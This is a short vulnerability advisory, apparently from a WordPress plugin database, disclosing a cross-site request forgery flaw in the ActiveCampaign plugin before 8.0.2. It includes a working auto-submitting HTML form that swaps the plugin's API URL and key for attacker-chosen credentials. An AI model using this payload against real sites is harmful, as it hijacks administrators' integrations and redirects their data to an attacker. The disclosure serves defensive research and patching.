WordPress Plugin Vulnerabilities
ActiveCampaign < 8.0.2 - Cross-Site Request Forgery in Settings
Description
The ActiveCampaign 8.0.1 plugin is lacking CSRF check on its Settings form, which could allow attacker to make a logged-in administrator change API Credentials to attacker's account.
Proof of Concept
When a logged-in administrator accesses an HTML page embedded below content, the plugin's setting will be changed. <html> <body> <form action="http://example.com/wp-admin/options-general.php?page=activecampaign" method="POST"> <input type="hidden" name="api_url" value="https://yopmail59247.api-us1.com" /> <input type="hidden" name="api_key" value="1eddfe8b3ac848b2154b0f6a1a345730ecef457745c2b70463e0a4838fd30d681ec20369" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-09-06 (about 3 years ago)
Added
2020-09-06 (about 3 years ago)
Last Updated
2021-01-22 (about 3 years ago)